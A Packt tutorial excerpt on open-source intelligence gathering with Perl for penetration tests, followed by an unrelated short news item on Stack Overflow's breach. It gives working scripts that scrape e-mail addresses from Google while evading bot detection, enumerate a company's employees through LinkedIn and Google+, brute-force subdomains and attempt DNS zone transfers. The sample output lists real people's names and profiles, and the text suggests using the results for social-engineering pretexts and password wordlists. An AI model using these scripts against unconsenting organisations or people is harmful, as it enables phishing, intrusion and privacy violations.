
How-To Tutorials - Security

174 Articles

Open Source Intelligence

Packt
30 Dec 2014
30 min read
This article is written by Douglas Berdeaux, the author of Penetration Testing with Perl. Open source intelligence (OSINT) refers to intelligence gathering from open and public sources. These sources include search engines, the client target's web-accessible software or sites, social media sites and forums, Internet routing and naming authorities, public information sites, and more. If done properly and thoroughly, OSINT can strengthen social engineering and remote exploitation attacks on our client target as we search for ways to gain access to their systems and buildings during a penetration test.

What's covered

In this article, we will cover how to gather the following information using Perl:

- E-mail addresses from our client target, using search engines and social media sites
- Networking, hosting, routing, and system data of our client target, using online resources and simple networking utilities

To gather this data, we rely heavily on the LWP::UserAgent Perl module. We will also discover how to use this module over a secure socket layer SSL/TLS (HTTPS) connection. In addition to this, we will learn about a few new Perl modules:

- Net::Whois::Raw
- Net::DNS::Dig
- Net::DNS
- Net::Traceroute
- XML::LibXML

Google dorks

Before we use Google for intelligence gathering, we should briefly touch upon Google dorks, which we can use to refine and filter our Google searches. A Google dork is a string of special syntax that we pass to Google's request handler using the q= option. A dork can comprise operators and keywords separated by a colon, with strings concatenated using a plus symbol (+) as a delimiter. Here is a short list of simple Google dorks that we can use to narrow our Google searches:

- intitle:<string> searches for pages whose HTML title tags contain the string <string>
- filetype:<ext> searches for files that have the extension <ext>
- site:<domain> narrows the search to only results that are located on the <domain> target servers
- inurl:<string> returns results that contain <string> in their URL
- -<word> negates the word following the minus symbol (-) in a search filter
- link:<page> searches for pages that contain HTML HREF links to the page

This is just a small list; a complete guide to Google search operators can be found on Google's support pages. A list of well-known Google dorks exploited for information gathering can be found in the Google Hacking Database at http://www.exploit-db.com/google-dorks/.
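To make the operator syntax concrete, here is a minimal sketch (the domain and search term are hypothetical, and URI::Escape is simply one convenient way to handle the encoding) that assembles a dork and URL-encodes it for Google's q= request handler:

#!/usr/bin/perl -w
use strict;
use URI::Escape; # provides uri_escape() for percent-encoding

my $domain = "example.com"; # hypothetical target domain
my $term   = "index of";    # hypothetical search string

# Operators and keywords are joined with a colon; uri_escape()
# percent-encodes the spaces and quotation marks for us.
my $dork = 'site:' . $domain . ' intitle:"' . $term . '" -www';
print 'https://www.google.com/search?q=' . uri_escape($dork), "\n";

Running this prints a ready-to-request search URL, which can then be fetched with LWP::UserAgent exactly as in the scripts that follow.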
E-mail address gathering

Getting e-mail addresses from our target can be a rather hard task, and it can also mean gathering usernames used within the target's domain, remote management systems, databases, workstations, web applications, and much more. As we can imagine, gathering a username is 50 percent of the intrusion for target credential harvesting; the other 50 percent is the password information. So how do we gather e-mail addresses from a target? There are several methods; the first we will look at is simply using search engines to crawl the web for anything useful, including forum posts, social media, e-mail lists for support, web pages and mailto links, and anything else cached or found by ever-spidering search engines.

Using Google for e-mail address gathering

Automating queries to search engines is usually best left to application programming interfaces (APIs). We might be able to query the search engine via a simple GET request, but this leaves enough room for error, and the search engine can potentially block our IP address temporarily or force us to prove our humanness with a CAPTCHA image of words, as it might assume that we are using a bot. Unfortunately, Google only offers a paid version of their general search API. They do, however, offer an API for custom search, but this is restricted to specified domains. We want to be as thorough as possible and search as much of the web as we can, time permitting, when intelligence gathering. Let's go back to our LWP::UserAgent Perl module and make a simple request to Google, searching for any e-mail addresses and URLs from a given domain. The URLs are useful as they can be spidered to within our application if we feel inclined to extend the reach of our automated OSINT. In the following examples, we want to impersonate a browser as much as possible so as not to raise flags at Google by using automation. We accomplish this by using the LWP::UserAgent Perl module and spoofing a valid Firefox user agent:

#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;
use LWP::Protocol::https;
my $usage = "Usage ./email_google.pl <domain>";
my $target = shift or die $usage;
my $ua = LWP::UserAgent->new;
my %emails = (); # unique
my $url = 'https://www.google.com/search?num=100&start=0&hl=en&meta=&q=%40%22'.$target.'%22';
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1 en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18");
$ua->timeout(10); # setup a timeout
$ua->show_progress(1); # display progress bar
my $res = $ua->get($url);
if($res->is_success){
 my @urls = split(/url\?q=/,$res->as_string);
 foreach my $gUrl (@urls){ # Google URLs
  next if($gUrl =~ m/(webcache.googleusercontent)/i or not $gUrl =~ m/^http/);
  $gUrl =~ s/&amp;sa=U.*//;
  print $gUrl,"\n";
 }
 my @emails = $res->as_string =~ m/[a-z0-9_.-]+@/ig;
 foreach my $email (@emails){
  if(not exists $emails{$email}){
   print "Possible Email Match: ",$email,$target,"\n";
   $emails{$email} = 1; # hashes are faster
  }
 }
}else{
 die $res->status_line;
}

The LWP::UserAgent module used in the previous code is not new to us. We did, however, add SSL support using the LWP::Protocol::https module. Our $url object is a simple Google search URL that anyone would browse to with a normal browser. The num= value pertains to the number of results returned by Google on a single page, which we have set to 100. To also act as a browser, we need to set the user agent with the agent() method, which we did as a Mozilla browser. After this, we set a timeout and a Boolean to show a simple progress bar. The rest is just simple Perl string manipulation and pattern matching. We use the regular expression url\?q= to split the string returned by the as_string method of the $res object. Then, for each URL string, we use another regular expression, &amp;sa=U.*, to remove the excess analytics garbage that Google appends. Then, we simply parse out all e-mail addresses found using the same method but a different regexp. We stuff all matches into the @emails array and loop over them, displaying them on our screen if they don't already exist in the %emails Perl hash.
Let's run this program against the weaknetlabs.com domain and analyze the output:

root@wnld960:~# perl email_google.pl weaknetlabs.com
** GET https://www.google.com/search?num=100&start=0&hl=en&meta=&q=%40%22weaknetlabs.com%22 ==> 200 OK (1s)
http://weaknetlabs.com/
http://weaknetlabs.com/main/%3Fpage_id%3D479
…
http://www.securitytube.net/video/2039
Possible Email Match: Douglas@weaknetlabs.com
Possible Email Match: weaknetlabs@weaknetlabs.com
root@wnld960:~#

This is the (trimmed) output when we run an automated Google search for e-mail addresses from weaknetlabs.com.

Using social media for e-mail address gathering

Now, let's turn our attention to using social media sites such as Google+, LinkedIn, and Facebook to try to gather e-mail addresses using Perl. Social media sites can sometimes reflect information about an employee's attitude towards their employer, their status within the company, their position, e-mail addresses, and more. All of this information is considered OSINT and can be useful when advancing our attacks.

Google+

We can also search plus.google.com for contact information from users belonging to our target. The following is the URL-encoded Google dork we will use to search Google+ profiles for an employee of our target:

intitle%3A"About+-+Google%2B"+"Works+at+'.$target.'"+site%3Aplus.google.com

The URL-encoded symbols are as follows:

- %3A: This is a colon, that is, :
- %2B: This is a plus symbol, that is, +

The plus symbol (+) is a special component of a Google dork, as we mentioned in the previous section. The intitle keyword tells Google to display results whose HTML <title> tag contains the About - Google+ text. Then, we add the string (in quotations) "Works at " (notice the space at the end), and then the target name as the string object $target. The site keyword tells the Google search engine to only display results from the plus.google.com site. Let's implement this in our Perl program and see what results are returned for Google employees:

#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;
use LWP::Protocol::https;
my $ua = LWP::UserAgent->new;
my $usage = "Usage ./googleplus.pl <target name>";
my $target = shift or die $usage;
$target =~ s/\s/+/g;
my $gUrl = 'https://www.google.com/search?safe=off&noj=1&sclient=psy-ab&q=intitle%3A"About+-+Google%2B"+"Works+at+'.$target.'"+site%3Aplus.google.com&oq=intitle%3A"About+-+Google%2B"+"Works+at+'.$target.'"+site%3Aplus.google.com';
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1 en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18");
$ua->timeout(10); # setup a timeout
my $res = $ua->get($gUrl);
if($res->is_success){
 foreach my $string (split(/url\?q=/,$res->as_string)){
  next if($string =~ m/(webcache.googleusercontent)/i or not $string =~ m/^http/);
  $string =~ s/&amp;sa=U.*//;
  print $string,"\n";
 }
}else{
 die $res->status_line;
}

This Perl program is quite similar to our last search program. Now, let's run it to find possible Google employees. Since a target client company can have spaces in its name, we accommodate them by encoding them for Google as plus symbols:

root@wnld960:~# perl googleplus.pl google
https://plus.google.com/%2BPaulWilcox/about
https://plus.google.com/%2BNatalieVillalobos/about
...
https://plus.google.com/%2BAndrewGerrand/about
root@wnld960:~#

The preceding (trimmed) output proves that our Perl script works, as we can confirm by browsing to the returned results. These two Google search scripts provided us with some great information quickly.
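Both of these scripts read only the first page of results. As a hedged sketch (the page limit and delay here are arbitrary choices, and heavy automation may still trip Google's bot detection), the same request could be paginated by incrementing the start= parameter:

#!/usr/bin/perl -w
# Sketch only: page through Google results 100 at a time by
# incrementing the start= parameter, pausing between requests.
use strict;
use LWP::UserAgent;
use LWP::Protocol::https;

my $target = shift or die "Usage ./paginate.pl <domain>";
my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1 en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18");
$ua->timeout(10);

for(my $start = 0; $start < 300; $start += 100){ # 3 pages, an arbitrary cap
 my $url = 'https://www.google.com/search?num=100&start='.$start.'&q=%40%22'.$target.'%22';
 my $res = $ua->get($url);
 last unless $res->is_success;
 # ... parse $res->as_string exactly as in email_google.pl ...
 sleep 2; # be polite between requests
}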
Let's move on to another example, not using Google but LinkedIn, a social media site for professionals.

LinkedIn

LinkedIn can provide us with the contact information and IT skill levels of our client target during a penetration test. Here, we will focus on the contact information. By now, we should feel very comfortable making any type of web request using LWP::UserAgent and parsing its output for intelligence data. In fact, this LinkedIn example should be a breeze. The trick is fine-tuning our filters and regular expressions to get only relevant data. Let's just dive right into the code and then analyze some sample output:

#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;
use LWP::Protocol::https;
my $ua = LWP::UserAgent->new;
my $usage = "Usage ./googlepluslinkedin.pl <target name>";
my $target = shift or die $usage;
my $gUrl = 'https://www.google.com/search?q=site:linkedin.com+%22at+'.$target.'%22';
my %lTargets = (); # unique
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1 en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18");
$ua->timeout(10); # setup a timeout
my $google = getUrl($gUrl); # one and ONLY call to Google
foreach my $title ($google =~ m/\shref="\/url\?.*">[a-z0-9_. -]+\s?.\b.at $target..\b.\s-\slinked/ig){
 my $lRurl = $title;
 $title =~ s/.*">([^<]+).*/$1/;
 $lRurl =~ s/.*url\?.*q=(.*)&amp;sa.*/$1/;
 print $title,"-> ".$lRurl."\n";
 my @ln = split(/\15?\12/,getUrl($lRurl));
 foreach(@ln){
  if(m/title="/i){
   my $link = $_;
   $link =~ s/.*href="([^"]+)".*/$1/;
   next if exists $lTargets{$link};
   $lTargets{$link} = 1;
   my $name = $_;
   $name =~ s/.*title="([^"]+)".*/$1/;
   print "\t",$name," : ",$link,"\n";
  }
 }
}
sub getUrl{
 sleep 1; # pause...
 my $res = $ua->get(shift);
 if($res->is_success){
  return $res->as_string;
 }else{
  die $res->status_line;
 }
}

The preceding Perl program makes one query to Google to find all possible positions at the target; for each position found, it queries LinkedIn to find employees of the target in that position. The regular expressions used were finely crafted after inspecting the HTML returned by simple queries to both Google and LinkedIn. This is a great example of how we can spider off from our initial Google results to gather even more intelligence using Perl automation. Let's take a look at some sample output from this program when used against Walmart.com:

root@wnld960:~# perl linkedIn.pl Walmart
Buyer : http://www.linkedin.com/title/buyer/at-walmart/
        Jason Kloster : http://www.linkedin.com/in/jasonkloster
        Rajiv Ahirwal : http://www.linkedin.com/in/rajivahirwal
...
Store manager : http://www.linkedin.com/title/store%2Bmanager/at-walmart/
        Benjamin Hunt 13k+ (LION) #1 Connected Leader at Walmart : http://www.linkedin.com/in/benjaminhunt01
...
Shift manager : http://www.linkedin.com/title/shift%2Bmanager/at-walmart/
        Frank Burns : http://www.linkedin.com/pub/frank-burns/24/83b/285
...
Assistant store manager : http://www.linkedin.com/title/assistant%2Bstore%2Bmanager/at-walmart/
        John Cole : http://www.linkedin.com/pub/john-cole/67/392/b39
        Crystal Herrera : http://www.linkedin.com/pub/crystal-herrera/92/74a/97b
root@wnld960:~#

The preceding (trimmed) output provided some great insight into employee positions, and even real employees in those positions at the target, with a simple call to one script.
All of this information is publicly available, and we are not directly attacking Walmart or its employees; we are just using this as an example of intelligence-gathering techniques during a penetration test using Perl programming. This information can further be used for reporting, and we can even extend this data into other areas of research. For instance, we can easily follow the LinkedIn links with LWP::UserAgent and pull even more data from the publicly available LinkedIn profiles. This data, when compared with Google+ profile data and simple Google searches, should help in providing the background needed to create a more believable pretext for social engineering. Now, let's see if we can use Google to search more social media websites for information on our client target.

Facebook

We can easily argue that Facebook is one of the largest social networking sites around at the time of writing this book. Facebook can easily return a large amount of data about a person, and we don't even have to go to the site to get it! We can easily extend our reach into the Web with the employee names gathered by our previous code by searching Google with the site:facebook.com parameter and the exact same syntax as in the first example of the E-mail address gathering section. The following are a few simple Google dorks that can possibly reveal information about our client target:

- site:facebook.com "manager at target"
- site:facebook.com "ceo at target"
- site:facebook.com "owner of target"
- site:facebook.com "experience at target"

These searches can return customer and employee criticism that can be used for a wide array of penetration-testing purposes, including social engineering pretexting. We can narrow our focus even further by adding other keywords and strings from our previously gathered intelligence, such as city names, company names, and more. Just about anything returned can be compiled into a unique wordlist for password cracking and contrasted with known data using Digital Credential Analysis (DCA).
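As a small sketch (the company name is hypothetical), these variations could be generated for any target in a loop and then fed to the same LWP::UserAgent request routine used in the earlier scripts:

#!/usr/bin/perl -w
use strict;

# Sketch: expand a hypothetical target name into the dork variations above.
my $target = "ExampleCorp";
foreach my $role ("manager at", "ceo at", "owner of", "experience at"){
 print 'site:facebook.com "'.$role.' '.$target.'"',"\n";
}

Each printed dork can then be URL-encoded and submitted as the q= parameter, just as we did in the e-mail gathering examples.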
Domain Name Services

Domain Name Services (DNS) are used to translate hostnames into IP addresses so that we can use alphanumeric addresses instead of numeric IP addresses for websites or services. It makes our lives a lot easier to type in a URL with a name rather than a 4-byte numerical value. Any client target can potentially have full control over their naming services. DNS A records can be assigned to any IP address. We can easily write our own record with domain control for an IPv4 class A address, such as 10.0.0.1, which is commonly done on an internal network to allow its users to easily connect to different internal services.

The Whois query

Sometimes, when we can get an IP address for a client target, we can pass this IP address to the Whois database, and in return we can get the range of IP addresses in which our IP lies and the organization that owns the range. If the organization is our target, then we now know a range of IP addresses pointing directly to their resources. Usually, this information is given to us during a penetration test, along with limits on how far we are allowed to go with the IP ranges, so we may be restricted simply to reporting.

Let's use Perl and the Net::Whois::Raw module to interact with the American Registry for Internet Numbers (ARIN) database for an IP address:

#!/usr/bin/perl -w
use strict;
use Net::Whois::Raw;
die "Usage: perl netRange.pl <IP Address>" unless $ARGV[0];
foreach(split(/\n/,whois(shift))){
 print $_,"\n" if(m/^(netrange|orgname)/i);
}

The preceding code, when run, should produce information about the network range and the name of the organization that owns the range. It is very simple, and it can be compared to calling the whois program from the Linux command line. If we were to script this to run through a number of different IP addresses and run the Whois query against each one, we could be violating the terms of service set by ARIN. Let's test it and see what we get with a random IP address:

root@wnld960:~# perl whois.pl 198.123.2.22
NetRange:       198.116.0.0 - 198.123.255.255
OrgName:        National Aeronautics and Space Administration
root@wnld960:~#

This is the output from our Perl program, which reveals an IP range that can belong to the organization listed. If this fails, and we need to find more than one hostname owned by our client target, we can try a brute force method that simply checks our name servers; we will do just that in the next section.

The DIG query

DIG stands for domain information groper and is a utility that does just that using DNS queries. The DIG Linux utility has largely replaced the older host and nslookup utilities. In making these queries, one thing to note is that when we don't specify a name server to use, the DIG utility simply uses the Linux OS default resolver. We can, however, pass a name server to DIG; we will cover this in the upcoming section, Zone transfers. There is a nice object-oriented Perl module for DIG that we will examine, called Net::DNS::Dig. Let's quickly look at an example of querying our DNS with this module:

#!/usr/bin/perl -w
use Net::DNS::Dig;
use strict;
my $dig = new Net::DNS::Dig();
my $dom = shift or die "Usage: perl dig.pl <domain>";
my $dobj = $dig->for($dom, 'A');
print $dobj->sprintf; # print entire dig query response
print "CODE: ",$dobj->rcode(1),"\n"; # Dig Response Code
my %mx = Net::DNS::Dig->new()->for($dom,'MX')->rdata();
while(my($val,$server) = each(%mx)){
 print "MX: ",$server," - ",$val,"\n";
}

The preceding code is simple. We create a DIG object, $dig, and call the for() method, passing the domain name we pulled by shifting the command-line arguments and the type A for A records. We print the returned response with sprintf(), and then the response code alone with the rcode() method. Finally, we create a hash object, %mx, from the rdata() method. We call rdata() after making a new Net::DNS::Dig object and calling the for() method on it with a type of MX for the mail server. Let's try this against a domain and see what is returned:

root@wnld960:~# perl dig.pl weaknetlabs.com
; <<>> Net::DNS::Dig 0.12 <<>> -t a weaknetlabs.com.
;;
;; Got answer.
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 34071
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;weaknetlabs.com.               IN      A
;; ANSWER SECTION:
weaknetlabs.com.        300     IN      A       198.144.36.192
;; Query time: 118 ms
;; SERVER: 75.75.76.76# 53(75.75.76.76)
;; WHEN: Mon May 19 18:26:31 2014
;; MSG SIZE rcvd: 49 -- XFR size: 2 records
CODE: NOERROR
MX: mailstore1.secureserver.net - 10
MX: smtp.secureserver.net - 0

The output is just as expected.
Everything above the line starting with CODE is the response from the DIG query. CODE is returned from the rcode() method. Since we passed a true value to rcode(), we got a string type, NOERROR, returned. Next, we printed the key and value pairs of the %mx Perl hash, which displayed our target's e-mail server names.

Brute force enumeration

Keeping the previous lesson in mind, and knowing that Linux offers a great wealth of networking utilities, we might be inclined to write our own DNS brute force tool to enumerate any possible A records that our client target could have created prior to our penetration test. Let's take a quick look at the nslookup utility we can use to check whether a record exists:

trevelyn@wnld960:~$ nslookup admin.warcarrier.org
Server:         75.75.76.76
Address:        75.75.76.76#53
Non-authoritative answer:
Name:   admin.warcarrier.org
Address: 10.0.0.1
trevelyn@wnld960:~$ nslookup admindoesntexist.warcarrier.org
Server:         75.75.76.76
Address:        75.75.76.76#53
** server can't find admindoesntexist.warcarrier.org: NXDOMAIN
trevelyn@wnld960:~$

This is the output of two calls to nslookup, the networking utility used for returning IP addresses of hostnames, and vice versa. The first A record check was successful, and the second, for the admindoesntexist subdomain, was not. We can easily see from the output of this program how we could parse it to check whether a subdomain exists. We can also see from the two subdomains that we can use a simple wordlist of commonly used subdomains for efficiency, before trying many possible combinations. A lot of this intelligence gathering might already have been done for you by search engines such as Google. In fact, the keyword search site: can return more than just the www subdomains. If we broaden our num= URL GET parameter and loop through all possible results by incrementing the start= parameter, we can potentially get results from other subdomains of our target. Now that we have seen the basic query for a subdomain, let's turn our focus to using Perl and a new Perl module, Net::DNS, to enumerate a few subdomains:

#!/usr/bin/perl -w
use strict;
use Net::DNS;
my $dns = Net::DNS::Resolver->new;
my @subDomains = ("admin","admindoesntexist","www","mail","download","gateway");
my $usage = "perl domainbf.pl <domain name>";
my $domain = shift or die $usage;
my $total = 0;
dns($_) foreach(@subDomains);
print $total," records tested\n";
sub dns{ # search sub domains:
 $total++; # record count
 my $hn = shift.".".$domain; # construct hostname
 my $dnsLookup = $dns->search($hn);
 if($dnsLookup){ # successful lookup
  my $t=0;
  foreach my $ip ($dnsLookup->answer){
   return unless $ip->type eq "A" and $t<1; # A records
   print $hn,": ",$ip->address,"\n"; # just the IP
   $t++;
  }
 }
 return;
}

The preceding Perl program loops through the @subDomains array and calls the dns() subroutine on each entry, which prints a successful query and returns. The $t integer token is used for subdomains that have several identical records, to avoid repetition in the program's output. After this, we simply print the total number of records tested. This program can easily be modified to open a wordlist file and loop through each entry, passing it to the dns() subroutine, with something similar to the following:

open(my $fh, "<", "file.txt") or die $!;
while(<$fh>){
 chomp;   # strip the newline before building the hostname
 dns($_);
}
close($fh);
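We can also tie this back to the earlier Google searches. The following is only a rough sketch (it assumes the @urls list parsed in email_google.pl and the dns() subroutine above are both in scope, and the regular expression is illustrative): candidate subdomains harvested from search results can be fed straight into the brute force checker:

# Sketch: extract candidate subdomains from previously gathered Google
# result URLs and test each one with the dns() subroutine defined above.
my %subs = ();
foreach my $gUrl (@urls){ # @urls as parsed in email_google.pl
 $subs{lc($1)} = 1 if $gUrl =~ m/^https?:\/\/([a-z0-9-]+)\.\Q$domain\E/i;
}
dns($_) foreach(keys %subs);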
Zone transfers

As we have seen with an A record, the admin.warcarrier.org entry provided us with some insight into the IP range of the internal network, namely the class A address 10.0.0.1. Sometimes, when a client target is controlling and hosting their own name servers, they accidentally allow DNS zone transfers from their name servers to public name servers, providing an attacker with information about where the target's resources are. Let's use the Linux host utility to check for a DNS zone transfer:

[trevelyn@shell ~]$ host -la warcarrier.org beth.ns.cloudflare.com
Trying "warcarrier.org"
Using domain server:
Name: beth.ns.cloudflare.com
Address: 2400:cb00:2049:1::adf5:3a67#53
Aliases:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 20461
;; flags: qr aa; QUERY: 1, ANSWER: 13, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;warcarrier.org.                IN      AXFR
;; ANSWER SECTION:
warcarrier.org.          300  IN  SOA    beth.ns.cloudflare.com. warcarrier.org. beth.ns.cloudflare.com. 2014011513 18000 3600 86400 1800
warcarrier.org.          300  IN  NS     beth.ns.cloudflare.com.
warcarrier.org.          300  IN  NS     hank.ns.cloudflare.com.
warcarrier.org.          300  IN  A      50.97.177.66
admin.warcarrier.org.    300  IN  A      10.0.0.1
gateway.warcarrier.org.  300  IN  A      10.0.0.124
remote.warcarrier.org.   300  IN  A      10.0.0.15
partner.warcarrier.org.  300  IN  CNAME  warcarrier.weaknetlabs.com.
calendar.warcarrier.org. 300  IN  CNAME  login.secureserver.net.
direct.warcarrier.org.   300  IN  CNAME  warcarrier.org.
warcarrier.org.          300  IN  SOA    beth.ns.cloudflare.com. warcarrier.org. beth.ns.cloudflare.com. 2014011513 18000 3600 86400 1800
Received 401 bytes from 2400:cb00:2049:1::adf5:3a67#53 in 56 ms
[trevelyn@shell ~]$

As we can see from the output of the host command, we have found a successful DNS zone transfer, which provided us with even more hostnames used by our client target. This attack has provided us with a few CNAME records, which are used as aliases to other servers owned or used by our target, the subnet (class A) IP addresses used by the target, and even the name servers used. We can also see that the default name, direct, used by CloudFlare.com is still set for the cloud service to allow connections directly to the IP of warcarrier.org, which we can use to bypass the cloud service. The host command requires the name server, in our case beth.ns.cloudflare.com, before performing the transfer. What this means for us is that we will need the name server information before querying for a potential DNS zone transfer in our Perl programs. Let's see how we can use Net::DNS for the entire process:

#!/usr/bin/perl -w
use strict;
use Net::DNS;
my $usage = "perl dnsZt.pl <domain name>";
die $usage unless my $dom = shift;
my $res = Net::DNS::Resolver->new; # dns object
my $query = $res->query($dom,"NS"); # query method call for nameservers
if($query){ # query of NS was successful
 foreach my $rr (grep{$_->type eq 'NS'} $query->answer){
  $res->nameservers($rr->nsdname); # set the name server
  print "[>] Testing NS Server: ".$rr->nsdname."\n";
  my @subdomains = $res->axfr($dom);
  if ($#subdomains > 0){
   print "[!] Successful zone transfer:\n";
   foreach (@subdomains){
    print $_->name."\n"; # returns a Net::DNS::RR object
   }
  }else{ # 0 returned domains
   print "[>] Transfer failed on " . $rr->nsdname . "\n";
  }
 }
}else{ # Something went wrong:
 warn "query failed: ", $res->errorstring,"\n";
}

The preceding program, which uses the Net::DNS Perl module, will first query for the name servers used by our target and then attempt a DNS zone transfer against each of them.
The grep() function returns to the foreach() loop a list of all name servers (NS) found. The foreach() loop then simply attempts the DNS zone transfer (AXFR) and returns the results if the returned array contains more than zero elements. Let's test the output on our client target:

[trevelyn@shell ~]$ perl dnsZt.pl warcarrier.org
[>] Testing NS Server: hank.ns.cloudflare.com
[!] Successful zone transfer:
warcarrier.org
warcarrier.org
admin.warcarrier.org
gateway.warcarrier.org
remote.warcarrier.org
partner.warcarrier.org
calendar.warcarrier.org
direct.warcarrier.org
[>] Testing NS Server: beth.ns.cloudflare.com
[>] Transfer failed on beth.ns.cloudflare.com
[trevelyn@shell ~]$

The preceding (trimmed) output shows a successful DNS zone transfer on one of the name servers used by our client target.

Traceroute

With knowledge of how to glean hostnames and IP addresses from simple queries using Perl, we can take the OSINT a step further and trace our route to the hosts to see what potentially target-owned hardware can intercept or relay traffic. For this task, we will use the Net::Traceroute Perl module. Let's take a look at how we can get the IP host information from relaying hosts between us and our target, using this Perl module and the following code:

#!/usr/bin/perl -w
use strict;
use Net::Traceroute;
my $dom = shift or die "Usage: perl tracert.pl <domain>";
print "Tracing route to ",$dom,"\n";
my $tr = Net::Traceroute->new(host=>$dom,use_tcp=>1);
for(my $i=1; $i<=$tr->hops; $i++){
 my $hop = $tr->hop_query_host($i,0);
 print "IP: ",$hop," hop time: ",$tr->hop_query_time($i,0),
       "ms hop status: ",$tr->hop_query_stat($i,0),
       " query count: ",$tr->hop_queries($i),"\n" if($hop);
}

In the preceding Perl program, we used the Net::Traceroute Perl module to perform a trace route to the domain given as a command-line argument. The module must be used by first calling the new() method, which we do when defining $tr as a query object. We tell the trace route object $tr that we want to use TCP and also pass the host, which we shift from the command-line arguments. We can pass many more parameters to the new() method, one of which is debug=>9 to debug our trace route. A full list can be obtained from the CPAN Search page for the Perl module at http://search.cpan.org/~hag/Net-Traceroute/Traceroute.pm. The hops method is used when constructing the for() loop and returns an integer value of the hop count. We assign this to $i and loop through all hops, printing statistics using the methods hop_query_host for the IP address of the host, hop_query_time for the time taken to reach the host (on our lab machines, it is returned in milliseconds), and hop_query_stat, which returns the status of the query as an integer value that can be mapped to the export list of Net::Traceroute according to the module's documentation.
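For example, here is a minimal sketch of enabling that debugging output; the other parameters are unchanged from the script above:

# Sketch: the same traceroute object with verbose debugging enabled,
# as noted in the module's documentation.
my $tr = Net::Traceroute->new(
 host    => $dom,
 use_tcp => 1,
 debug   => 9,
);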
Now, let's test this trace route program with a domain and check the output:

root@wnld960:~# sudo perl tracert.pl weaknetlabs.com
Tracing route to weaknetlabs.com
IP: 10.0.0.1 hop time: 0.724ms hop status: 0 query count: 3
IP: 68.85.73.29 hop time: 14.096ms hop status: 0 query count: 3
IP: 69.139.195.37 hop time: 19.173ms hop status: 0 query count: 3
IP: 68.86.94.189 hop time: 31.102ms hop status: 0 query count: 3
IP: 68.86.87.170 hop time: 27.42ms hop status: 0 query count: 3
IP: 50.242.150.186 hop time: 27.808ms hop status: 0 query count: 3
IP: 144.232.20.144 hop time: 33.688ms hop status: 0 query count: 3
IP: 144.232.25.30 hop time: 38.718ms hop status: 0 query count: 3
IP: 144.232.229.46 hop time: 31.242ms hop status: 0 query count: 3
IP: 144.232.9.82 hop time: 99.124ms hop status: 0 query count: 3
IP: 198.144.36.192 hop time: 30.964ms hop status: 0 query count: 3
root@wnld960:~#

The output from tracert.pl is just what we would expect from the traceroute program of the Linux shell. This functionality can easily be built right into our port scanner application.

Shodan

Shodan is an online resource that can be used for hardware searching within a specific domain. For instance, a search for hostname:<domain> will return all the hardware entities found within that specific domain. Shodan is both a public and open source resource for intelligence. Harnessing the full power of Shodan and returning a multipage query is not free. For the examples in this article, the first page of the query results, which is free, was sufficient to provide a suitable amount of information. The returned output is XML, and Perl has some great utilities to parse XML. Luckily, for the purpose of our example, Shodan offers a sample query result for us to use as export_sample.xml. This XML file contains only one node per host, labeled host. This node contains attributes for the corresponding host, and we will use the XML::LibXML::Node class from the XML::LibXML Perl module. First, we download the XML file and use XML::LibXML to open the local file with the parse_file() method, as shown in the following code:

#!/usr/bin/perl -w
use strict;
use XML::LibXML;
my $parser = XML::LibXML->new();
my $doc = $parser->parse_file("export_sample.xml");
foreach my $host ($doc->findnodes('/shodan/host')) {
 print "Host Found:\n";
 my @attribs = $host->attributes('/shodan/host');
 foreach my $host (@attribs){ # get host attributes
  print $host =~ m/([^=]+)=.*/," => ";
  print $host =~ m/.*"([^"]+)"/,"\n";
 } # next
 print "\n\n";
}

The preceding Perl program opens the export_sample.xml file and navigates through the host nodes using the simple XPath /shodan/host. For each <host> node, we call the attributes() method from the XML::LibXML::Node class, which returns an array of all attributes with information such as the IP address, hostname, and more. We then run a regular expression pattern on the $host string to parse out the key, and another regexp to get the value. Let's see how this returns data from our sample XML file from ShodanHQ.com:

root@wnld960:~# perl shodan.pl
Host Found:
hostnames => internetdevelopment.ro
ip => 109.206.71.21
os => Linux recent 2.4
port => 80
updated => 16.03.2010

Host Found:
ip => 113.203.71.21
os => Linux recent 2.4
port => 80
updated => 16.03.2010

Host Found:
hostnames => ip-173-201-71-21.ip.secureserver.net
ip => 173.201.71.21
os => Linux recent 2.4
port => 80
updated => 16.03.2010

The preceding output is from our shodan.pl Perl program.
It loops through all host nodes and prints their attributes. As we can see, Shodan can provide us with some very useful information that we can possibly use for exploitation later in our penetration testing. It's also easy to see, without going into elementary Perl coding examples, that we can find exactly what we are looking for in an XML object's attributes using this simple method. We can use this code for other resources as well.

More intelligence

Gaining information about the actual physical address is also important during a penetration test. Sure, this is public information, but where do we find it? The PTES describes how most states require a legal entity of a company to register with the State Division, which can provide us with a one-stop place for the physical address information, entity ID, service of process agent information, and more. This can be very useful information about our client target. If obtained, we can extend this intelligence by finding out more about the property owners for physical penetration testing and social engineering by checking the city or county's department of land records, real estate, deeds, or even mortgages. All of this data, if hosted on the Web, can be gathered by automated Perl programs, as we did in the example sections of this article using LWP::UserAgent.

Summary

As we have seen, creative information-gathering techniques can really shine with the power of regular expressions and the ability to spider links. As we learned in the introduction, it's best to combine an automated OSINT gathering process with a manual process, because each can reveal information that the other might have missed.

Resources for Article:

Further resources on this subject:
- Ruby and Metasploit Modules
- Linux Shell Scripting – various recipes to help you
- Linux Shell Script: Logging Tasks


Stack Overflow confirms production systems hacked

Vincy Davis
17 May 2019
2 min read
Almost a week after the attack, Stack Overflow admitted in an official security update yesterday that their production systems had been hacked. “Over the weekend, there was an attack on Stack Overflow. We have confirmed that some level of production access was gained on May 11,” said Mary Ferguson, VP of Engineering at Stack Overflow. In this short update, the company mentioned that they are investigating the extent of the access and are addressing all the known vulnerabilities. Though the investigation is not complete, the company has so far identified no breach of customer or user data.

